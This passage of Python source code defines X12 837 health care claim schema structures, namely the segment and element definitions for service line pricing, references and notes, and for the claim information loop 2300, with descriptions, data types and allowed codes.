position=1, codes=["OG", "TR"], ), ), Element( "MEA02", Properties( desc="Measurement Qualifier", req_sit="R", data_type=("ID", "1", "3"), position=2, codes=["HT", "R1", "R2", "R3", "R4"], ), ), Element( "MEA03", Properties( desc="Measurement Value", req_sit="R", data_type=("R", "1", "20"), position=3, codes=[], ), ), Composite( "C001", Properties( desc="Composite Unit of Measure", refdes="", repeat="", req_sit="N", seq="04", ), ), Element( "MEA05", Properties( desc="Range Minimum", req_sit="N", data_type=("R", "1", "20"), position=5, codes=[], ), ), Element( "MEA06", Properties( desc="Range Maximum", req_sit="N", data_type=("R", "1", "20"), position=6, codes=[], ), ), Element( "MEA07", Properties( desc="Measurement Significance Code", req_sit="N", data_type=("ID", "2", "2"), position=7, codes=[], ), ), Element( "MEA08", Properties( desc="Measurement Attribute Code", req_sit="N", data_type=("ID", "2", "2"), position=8, codes=[], ), ), Element( "MEA09", Properties( desc="Surface/Layer/Position Code", req_sit="N", data_type=("ID", "2", "2"), position=9, codes=[], ), ), Element( "MEA10", Properties( desc="Measurement Method or Device", req_sit="N", data_type=("ID", "2", "4"), position=10, codes=[], ), ), Element( "MEA11", Properties( desc="Code List Qualifier Code", req_sit="N", data_type=("ID", "1", "3"), position=11, codes=[], ), ), Element( "MEA12", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=12, codes=[], ), ), ), Segment( "CN1", Properties( desc="Contract Information", position="4650", repeat="1", req_sit="S", syntax="", ), Element( "CN101", Properties( desc="Contract Type Code", req_sit="R", data_type=("ID", "2", "2"), position=1, codes=["01", "02", "03", "04", "05", "06", "09"], ), ), Element( "CN102", Properties( desc="Monetary Amount", req_sit="S", data_type=("R", "1", "18"), position=2, codes=[], ), ), Element( "CN103", Properties( desc="Percent, Decimal Format", req_sit="S", data_type=("R", "1", "6"), position=3, codes=[], ), ), Element( "CN104", Properties( desc="Reference Identification", req_sit="S", data_type=("AN", "1", "50"), position=4, codes=[], ), ), Element( "CN105", Properties( desc="Terms Discount Percent", req_sit="S", data_type=("R", "1", "6"), position=5, codes=[], ), ), Element( "CN106", Properties( desc="Version Identifier", req_sit="S", data_type=("AN", "1", "30"), position=6, codes=[], ), ), ), Segment( "REF", Properties( desc="Repriced Line Item Reference Number", position="4700", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["9B"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Adjusted Repriced Line Item Reference Number", position="4700", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["9D"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Prior Authorization", position="4700", repeat="5", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["G1"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="S", seq="04" ), Element( "REF04-01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=0, codes=["2U"], ), ), Element( "REF04-02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=1, codes=[], ), ), Element( "REF04-03", Properties( desc="Reference Identification Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "REF04-04", Properties( desc="Reference Identification", req_sit="N", data_type=("AN", "1", "50"), position=3, codes=[], ), ), Element( "REF04-05", Properties( desc="Reference Identification Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "REF04-06", Properties( desc="Reference Identification", req_sit="N", data_type=("AN", "1", "50"), position=5, codes=[], ), ), ), ), Segment( "REF", Properties( desc="Line Item Control Number", position="4700", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["6R"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Mammography Certification Number", position="4700", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["EW"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Clinical Laboratory Improvement Amendment (CLIA) Number", position="4700", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["X4"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Referring Clinical Laboratory Improvement Amendment (CLIA) Facility Identification", position="4700", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["F4"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Immunization Batch Number", position="4700", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["BT"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Referral Number", position="4700", repeat="5", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["9F"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="S", seq="04" ), Element( "REF04-01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=0, codes=["2U"], ), ), Element( "REF04-02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=1, codes=[], ), ), Element( "REF04-03", Properties( desc="Reference Identification Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "REF04-04", Properties( desc="Reference Identification", req_sit="N", data_type=("AN", "1", "50"), position=3, codes=[], ), ), Element( "REF04-05", Properties( desc="Reference Identification Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "REF04-06", Properties( desc="Reference Identification", req_sit="N", data_type=("AN", "1", "50"), position=5, codes=[], ), ), ), ), Segment( "AMT", Properties( desc="Sales Tax Amount", position="4750", repeat="1", req_sit="S", syntax="" ), Element( "AMT01", Properties( desc="Amount Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=1, codes=["T"], ), ), Element( "AMT02", Properties( desc="Monetary Amount", req_sit="R", data_type=("R", "1", "18"), position=2, codes=[], ), ), Element( "AMT03", Properties( desc="Credit/Debit Flag Code", req_sit="N", data_type=("ID", "1", "1"), position=3, codes=[], ), ), ), Segment( "AMT", Properties( desc="Postage Claimed Amount", position="4750", repeat="1", req_sit="S", syntax="", ), Element( "AMT01", Properties( desc="Amount Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=1, codes=["F4"], ), ), Element( "AMT02", Properties( desc="Monetary Amount", req_sit="R", data_type=("R", "1", "18"), position=2, codes=[], ), ), Element( "AMT03", Properties( desc="Credit/Debit Flag Code", req_sit="N", data_type=("ID", "1", "1"), position=3, codes=[], ), ), ), Segment( "K3", Properties( desc="File Information", position="4800", repeat="10", req_sit="S", syntax="", ), Element( "K301", Properties( desc="Fixed Format Information", req_sit="R", data_type=("AN", "1", "80"), position=1, codes=[], ), ), Element( "K302", Properties( desc="Record Format Code", req_sit="N", data_type=("ID", "1", "2"), position=2, codes=[], ), ), Composite( "C001", Properties( desc="Composite Unit of Measure", refdes="", repeat="", req_sit="N", seq="03", ), ), ), Segment( "NTE", Properties( desc="Line Note", position="4850", repeat="1", req_sit="S", syntax="" ), Element( "NTE01", Properties( desc="Note Reference Code", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["ADD", "DCP"], ), ), Element( "NTE02", Properties( desc="Description", req_sit="R", data_type=("AN", "1", "80"), position=2, codes=[], ), ), ), Segment( "NTE", Properties( desc="Third Party Organization Notes", position="4850", repeat="1", req_sit="S", syntax="", ), Element( "NTE01", Properties( desc="Note Reference Code", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["TPO"], ), ), Element( "NTE02", Properties( desc="Description", req_sit="R", data_type=("AN", "1", "80"), position=2, codes=[], ), ), ), Segment( "PS1", Properties( desc="Purchased Service Information", position="4880", repeat="1", req_sit="S", syntax="", ), Element( "PS101", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=1, codes=[], ), ), Element( "PS102", Properties( desc="Monetary Amount", req_sit="R", data_type=("R", "1", "18"), position=2, codes=[], ), ), Element( "PS103", Properties( desc="State or Province Code", req_sit="N", data_type=("ID", "2", "2"), position=3, codes=[], ), ), ), Segment( "HCP", Properties( desc="Line Pricing/Repricing Information", position="4920", repeat="1", req_sit="S", syntax="R0113 P0910 P1112", ), Element( "HCP01", Properties( desc="Pricing Methodology", req_sit="R", data_type=("ID", "2", "2"), position=1, codes=[ "00", "01", "02", "03", "04", "05", "06", "07", "08", "09", "10", "11", "12", "13", "14", ], ), ), Element( "HCP02", Properties( desc="Monetary Amount", req_sit="R", data_type=("R", "1", "18"), position=2, codes=[], ), ), Element( "HCP03", Properties( desc="Monetary Amount", req_sit="S", data_type=("R", "1", "18"), position=3, codes=[], ), ), Element( "HCP04", Properties( desc="Reference Identification", req_sit="S", data_type=("AN", "1", "50"), position=4, codes=[], ), ), Element( "HCP05", Properties( desc="Rate", req_sit="S", data_type=("R", "1", "9"), position=5, codes=[], ), ), Element( "HCP06", Properties( desc="Reference Identification", req_sit="S", data_type=("AN", "1", "50"), position=6, codes=[], ), ), Element( "HCP07", Properties( desc="Monetary Amount", req_sit="S", data_type=("R", "1", "18"), position=7, codes=[], ), ), Element( "HCP08", Properties( desc="Product/Service ID", req_sit="N", data_type=("AN", "1", "48"), position=8, codes=[], ), ), Element( "HCP09", Properties( desc="Product/Service ID Qualifier", req_sit="S", data_type=("ID", "2", "2"), position=9, codes=["ER", "HC", "IV", "WK"], ), ), Element( "HCP10", Properties( desc="Product/Service ID", req_sit="S", data_type=("AN", "1", "48"), position=10, codes=[], ), ), Element( "HCP11", Properties( desc="Unit or Basis for Measurement Code", req_sit="S", data_type=("ID", "2", "2"), position=11, codes=["MJ", "UN"], ), ), Element( "HCP12", Properties( desc="Quantity", req_sit="S", data_type=("R", "1", "15"), position=12, codes=[], ), ), Element( "HCP13", Properties( desc="Reject Reason Code", req_sit="S", data_type=("ID", "2", "2"), position=13, codes=["T1", "T2", "T3", "T4", "T5", "T6"], ), ), Element( "HCP14", Properties( desc="Policy Compliance Code", req_sit="S", data_type=("ID", "1", "2"), position=14, codes=["1", "2", "3", "4", "5"], ), ), Element( "HCP15", Properties( desc="Exception Code", req_sit="S", data_type=("ID", "1", "2"), position=15, codes=["1", "2", "3", "4", "5", "6"], ), ), ), parsed_837_2410, parsed_837_2420A, parsed_837_2420B, parsed_837_2420C, parsed_837_2420D, parsed_837_2420E, parsed_837_2420F, parsed_837_2420G, parsed_837_2420H, parsed_837_2430, parsed_837_2440, ) parsed_837_2300 = Loop( "2300", Properties( desc="Claim Information", looptype="", position="1300", repeat="100", req_sit="S", ), Segment( "CLM", Properties( desc="Claim Information", position="1300", repeat="1", req_sit="R", syntax="", ), Element( "CLM01", Properties( desc="Claim Submitter's Identifier", req_sit="R", data_type=("AN", "1", "38"), position=1, codes=[], ), ), Element( "CLM02", Properties( desc="Monetary Amount", req_sit="R", data_type=("R", "1", "18"), position=2, codes=[], ), ), Element( "CLM03", Properties( desc="Claim Filing Indicator Code", req_sit="N", data_type=("ID", "1", "2"), position=3, codes=[], ), ), Element( "CLM04", Properties( desc="Non-Institutional Claim Type Code", req_sit="N", data_type=("ID", "1", "2"), position=4, codes=[], ), ), Composite( "C023", Properties( desc="Health Care Service Location Information", refdes="", repeat="", req_sit="R", seq="05", ), Element( "CLM05-01", Properties( desc="Facility Code Value", req_sit="R", data_type=("AN", "1", "2"), position=0, codes=[], ), ), Element( "CLM05-02", Properties( desc="Facility Code Qualifier", req_sit="R", data_type=("ID", "1", "2"), position=1, codes=["B"], ), ), Element( "CLM05-03", Properties( desc="Claim Frequency Type Code", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=[], ), ), ), Element( "CLM06", Properties( desc="Yes/No Condition or Response Code", req_sit="R", data_type=("ID", "1", "1"), position=6, codes=["N", "Y"], ), ), Element( "CLM07", Properties( desc="Provider Accept Assignment Code", req_sit="R", data_type=("ID", "1", "1"), position=7, codes=["A", "B", "C"], ), ), Element( "CLM08", Properties( desc="Yes/No Condition or Response Code", req_sit="R", data_type=("ID", "1", "1"), position=8, codes=["N", "W", "Y"], ), ), Element( "CLM09", Properties( desc="Release of Information Code", req_sit="R", data_type=("ID", "1", "1"), position=9, codes=["I", "Y"], ), ), Element( "CLM10", Properties( desc="Patient Signature Source Code", req_sit="S", data_type=("ID", "1", "1"), position=10, codes=["P"], ), ), Composite( "C024", Properties( desc="Related Causes Information", refdes="", repeat="", req_sit="S", seq="11", ), Element( "CLM11-01", Properties( desc="Related-Causes Code", req_sit="R", data_type=("ID", "2", "3"), position=0, codes=["AA", "EM", "OA"], ), ), Element( "CLM11-02", Properties( desc="Related-Causes Code", req_sit="S", data_type=("ID", "2", "3"), position=1, codes=["AA", "EM", "OA"], ), ), Element( "CLM11-03", Properties( desc="Related-Causes Code", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "CLM11-04", Properties( desc="State or Province Code", req_sit="S", data_type=("ID", "2", "2"), position=3, codes=[], ), ), Element( "CLM11-05", Properties( desc="Country Code", req_sit="S", data_type=("ID", "2", "3"), position=4, codes=[], ), ), ), Element( "CLM12", Properties( desc="Special Program Code", req_sit="S", data_type=("ID", "2", "3"), position=12, codes=["02", "03", "05", "09"], ), ), Element( "CLM13", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=13, codes=[], ), ), Element( "CLM14", Properties( desc="Level of Service Code", req_sit="N", data_type=("ID", "1", "3"), position=14, codes=[], ), ), Element( "CLM15", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=15, codes=[], ), ), Element( "CLM16", Properties( desc="Provider Agreement Code", req_sit="N", data_type=("ID", "1", "1"), position=16, codes=[], ), ), Element( "CLM17", Properties( desc="Claim Status Code", req_sit="N", data_type=("ID", "1", "2"), position=17, codes=[], ), ), Element( "CLM18", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=18, codes=[], ), ), Element( "CLM19", Properties( desc="Claim Submission Reason Code", req_sit="N", data_type=("ID", "2", "2"), position=19, codes=[], ), ), Element( "CLM20", Properties( desc="Delay Reason Code", req_sit="S", data_type=("ID", "1", "2"), position=20, codes=["1", "2", "3", "4", "5", "6", "7", "8", "9", "10", "11", "15"], ), ), ), Segment( "DTP", Properties( desc="Date - Onset of Current Illness or Symptom", position="1350", repeat="1", req_sit="S", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["431"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "DTP", Properties( desc="Date - Initial Treatment Date", position="1350", repeat="1", req_sit="S", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["454"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "DTP", Properties( desc="Date - Last Seen Date", position="1350", repeat="1", req_sit="S", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["304"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "DTP", Properties( desc="Date - Acute Manifestation", position="1350", repeat="1", req_sit="S", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["453"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "DTP", Properties( desc="Date - Accident", position="1350", repeat="1", req_sit="S", syntax="" ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["439"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "DTP", Properties( desc="Date - Last Menstrual Period", position="1350", repeat="1", req_sit="S", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["484"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "DTP", Properties( desc="Date - Last X-ray Date", position="1350", repeat="1", req_sit="S", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["455"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "DTP", Properties( desc="Date - Hearing and Vision Prescription Date", position="1350", repeat="1", req_sit="S", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["471"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "DTP", Properties( desc="Date - Disability Dates", position="1350", repeat="1", req_sit="S", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["314", "360", "361"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8", "RD8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "DTP", Properties( desc="Date - Last Worked", position="1350", repeat="1", req_sit="S", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["297"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "DTP", Properties( desc="Date - Authorized Return to Work", position="1350", repeat="1", req_sit="S", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["296"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "DTP", Properties( desc="Date - Admission", position="1350", repeat="1", req_sit="S", syntax="" ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["435"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "DTP", Properties( desc="Date - Discharge", position="1350", repeat="1", req_sit="S", syntax="" ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["096"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "DTP", Properties( desc="Date - Assumed and Relinquished Care Dates", position="1350", repeat="2", req_sit="S", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["090", "091"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "DTP", Properties( desc="Date - Property and Casualty Date of First Contact", position="1350", repeat="1", req_sit="S", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["444"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "DTP", Properties( desc="Date - Repricer Received Date", position="1350", repeat="1", req_sit="S", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["050"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "PWK", Properties( desc="Claim Supplemental Information", position="1550", repeat="10", req_sit="S", syntax="P0506", ), Element( "PWK01", Properties( desc="Report Type Code", req_sit="R", data_type=("ID", "2", "2"), position=1, codes=[ "03", "04", "05", "06", "07", "08", "09", "10", "11", "13", "15", "21", "A3", "A4", "AM", "AS", "B2", "B3", "B4", "BR", "BS", "BT", "CB", "CK", "CT", "D2", "DA", "DB", "DG", "DJ", "DS", "EB", "HC", "HR", "I5", "IR", "LA", "M1", "MT", "NN", "OB", "OC", "OD", "OE", "OX", "OZ", "P4", "P5", "PE", "PN", "PO", "PQ", "PY", "PZ", "RB", "RR", "RT", "RX", "SG", "V5", "XP", ], ), ), Element( "PWK02", Properties( desc="Report Transmission Code", req_sit="R", data_type=("ID", "1", "2"), position=2, codes=["AA", "BM", "EL", "EM", "FT", "FX"], ), ), Element( "PWK03", Properties( desc="Report Copies Needed", req_sit="N", data_type=("N0", "1", "2"), position=3, codes=[], ), ), Element( "PWK04", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "PWK05", Properties( desc="Identification Code Qualifier", req_sit="S", data_type=("ID", "1", "2"), position=5, codes=["AC"], ), ), Element( "PWK06", Properties( desc="Identification Code", req_sit="S", data_type=("AN", "2", "80"), position=6, codes=[], ), ), Element( "PWK07", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=7, codes=[], ), ), Composite( "C002", Properties( desc="Actions Indicated", refdes="", repeat="", req_sit="N", seq="08" ), ), Element( "PWK09", Properties( desc="Request Category Code", req_sit="N", data_type=("ID", "1", "2"), position=9, codes=[], ), ), ), Segment( "CN1", Properties( desc="Contract Information", position="1600", repeat="1", req_sit="S", syntax="", ), Element( "CN101", Properties( desc="Contract Type Code", req_sit="R", data_type=("ID", "2", "2"), position=1, codes=["01", "02", "03", "04", "05", "06", "09"], ), ), Element( "CN102", Properties( desc="Monetary Amount", req_sit="S", data_type=("R", "1", "18"), position=2, codes=[], ), ), Element( "CN103", Properties( desc="Percent, Decimal Format", req_sit="S", data_type=("R", "1", "6"), position=3, codes=[], ), ), Element( "CN104", Properties( desc="Reference Identification", req_sit="S", data_type=("AN", "1", "50"), position=4, codes=[], ), ), Element( "CN105", Properties( desc="Terms Discount Percent", req_sit="S", data_type=("R", "1", "6"), position=5, codes=[], ), ), Element( "CN106", Properties( desc="Version Identifier", req_sit="S", data_type=("AN", "1", "30"), position=6, codes=[], ), ), ), Segment( "AMT", Properties( desc="Patient Amount Paid", position="1750", repeat="1", req_sit="S", syntax="", ), Element( "AMT01", Properties( desc="Amount Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=1, codes=["F5"], ), ), Element( "AMT02", Properties( desc="Monetary Amount", req_sit="R", data_type=("R", "1", "18"), position=2, codes=[], ), ), Element( "AMT03", Properties( desc="Credit/Debit Flag Code", req_sit="N", data_type=("ID", "1", "1"), position=3, codes=[], ), ), ), Segment( "REF", Properties( desc="Service Authorization Exception Code", position="1800", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["4N"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Mandatory Medicare (Section 4081) Crossover Indicator", position="1800", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["F5"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Mammography Certification Number", position="1800", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["EW"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", 